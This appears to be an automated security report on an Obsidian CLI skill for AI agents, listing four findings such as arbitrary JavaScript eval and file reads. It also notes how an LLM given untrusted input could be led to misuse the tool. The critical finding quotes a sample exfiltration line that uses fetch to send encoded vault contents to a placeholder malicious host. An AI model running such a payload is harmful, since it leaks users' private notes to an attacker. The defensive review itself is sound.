Trust Assessment
obsidian-cli received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 2 high, 1 medium, and 0 low severity. Key findings include Arbitrary JavaScript execution via `obsidian eval`, Arbitrary file read via `obsidian read`, Excessive permissions of the `obsidian` CLI tool.
The analysis covered 4 layers: dependency_graph, manifest_analysis, llm_behavioral_safety, static_code_analysis. The llm_behavioral_safety layer scored lowest at 33/100, indicating areas for improvement.
Last analyzed on February 15, 2026 (commit 3e75fabd). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary JavaScript execution via `obsidian eval` The `obsidian eval code="..."` command allows for the execution of arbitrary JavaScript within the Obsidian application context. If the `code` parameter is derived from untrusted user input, an attacker could execute malicious code to exfiltrate data (e.g., `app.vault.read('sensitive.md')`, `fetch('malicious.com/?data=' + btoa(app.vault.read('all.md')))`) or perform other harmful actions within the Obsidian environment, including modifying application behavior or accessing local storage. This represents a direct command injection and data exfiltration vector. Implement strict input validation and sanitization for the `code` parameter when generating `obsidian eval` commands. Ideally, avoid allowing direct user control over this parameter. If necessary, use a strict allowlist of safe functions or a sandboxed environment to limit potential harm. | Unknown | SKILL.md:60 | |
| HIGH | Arbitrary file read via `obsidian read` The `obsidian read file="..."` command allows reading the content of any note or file within the Obsidian vault. If the `file` parameter is derived from untrusted user input, an attacker could specify paths to sensitive files (e.g., `secrets.md`, `passwords.txt`, plugin configuration files) and exfiltrate their content. This poses a significant data exfiltration risk. Implement strict input validation for the `file` parameter, ensuring it refers only to intended, non-sensitive files. Consider using a allowlist of accessible files or validating against known safe patterns to prevent path traversal or access to unauthorized data. | Unknown | SKILL.md:45 | |
| HIGH | Excessive permissions of the `obsidian` CLI tool The `obsidian` CLI tool, as described, possesses broad capabilities including reading/writing files, executing arbitrary JavaScript, and taking screenshots. While powerful, this extensive access surface increases the risk of misuse if the LLM is prompted to generate commands based on untrusted user input. An attacker could leverage these permissions to modify vault content, exfiltrate data, or disrupt the user's Obsidian environment. The combination of these capabilities grants a high level of control over the user's data and application. When integrating such a powerful tool, ensure that the LLM's usage is strictly constrained and that all parameters derived from user input are rigorously validated and sanitized. Consider implementing a human-in-the-loop approval process for high-risk operations (e.g., `eval`, `read`, `create`, `dev:screenshot`). | Unknown | SKILL.md:1 | |
| MEDIUM | Screenshot capture capability The `obsidian dev:screenshot path=screenshot.png` command can capture a screenshot of the Obsidian application. If this command is invoked with untrusted input for the `path` parameter or without explicit user consent, it could lead to the capture and potential exfiltration of sensitive visual information displayed within Obsidian. The screenshot could contain personal notes, confidential documents, or other private data. Ensure that screenshot commands are only executed with explicit user consent and that the output path is controlled and secure. Avoid allowing untrusted input to dictate the screenshot path to prevent writing to arbitrary or sensitive locations. | Unknown | SKILL.md:70 |
Scan History
Embed Code
[](https://skillshield.io/report/d51e955a52e8882d)
Powered by SkillShield